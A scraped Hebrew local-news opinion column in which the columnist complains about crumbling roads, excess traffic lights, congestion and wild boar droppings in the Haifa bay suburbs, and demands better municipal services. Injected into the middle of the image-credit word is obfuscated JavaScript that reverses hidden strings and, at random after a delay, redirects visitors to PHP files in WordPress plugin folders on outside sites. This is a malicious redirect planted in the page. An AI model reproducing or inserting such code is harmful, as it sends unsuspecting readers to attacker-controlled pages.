fbpx
[shortcode-weather-atlas city_selector=1178232 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

איכות החיים והשיבושים שבדרך

צ'רקס כועס, על השיבושים שהורסים את איכות חייהם של הקרייתים, על סכומי העתק שהם משקיעים והוא טוען שהגיע הזמן שנקבל תמורה על כל זה
איור: shutterstock
איור: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

בדרך כלל איכות חיים נמדדת על פי התשתיות של סביבת המגורים, בין אם מדובר בתשתיות חינוכיות, בריאותיות או תעבורתיות.

לגבי התעבורה הרי שאיזור מפרץ חיפה עדיין לא שוחרר מהמנדט הבריטי. כנוהג ברכב דו גלגלי, אני ממש מוטרד בלילה מהבורות הרבים באזור שדה התעופה בואכה אצטדיון קריית חיים. יש שם כבישים מתפוררים ועדיין קשה להאמין שזוהי התשתית ל-2021.

בנוסף לכך באזור קריית אתא מעיר גנים בואכה לכביש עכו חיפה, מישהו תקע יותר מידי רמזורים כאילו מדובר בבלונים להפרחה. ביום שני לפני החג, באזור איקאה, נתקעתי בפקק של חצי שעה וזה קצת מוגזם לדעתי, לתשומת לבם של פרנסי הציבור במרחב שלנו.

ואם דיברנו על שיבושים, עיריית חיפה וראשת העיר מאפשרים לחזירים לחרבן את חיי התושבים תרתי משמע. כתבנו על זה, קיבלנו תגובות מהדיירים שהצדיקו פתיחת מלחמה בתופעה והנה מסתבר שבנושא הכלבים וצואתם, העירייה יודעת לשים פקחים ולהטיל קנסות בהתאם, דבר שמביא לאכיפה חיובית בנושא.

ואם הקקי של הכלבים מפריע, מה קורה עם פחי הזבל וקקי החזירים? האם לא כדאי גם פה להטיל פיקוח והגבלות? הגיע הזמן שהשיבושים שאותם הזכרתי יטופלו במלא היעילות בידי העיריות.

כשרוצים עושים, ולראייה, כשהים וחופיו הוצף בזפת, ידעו לפעול מהר ובנחישות. הגיע הזמן שנקבל תמורה על הארנונה שלנו ולא רק מילים מכובסות ומנומסות.

 

 

לטור נוסף של צ'רקס לחצו כאן* לפייסבוק של הד הקריות לחצו כאן*

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות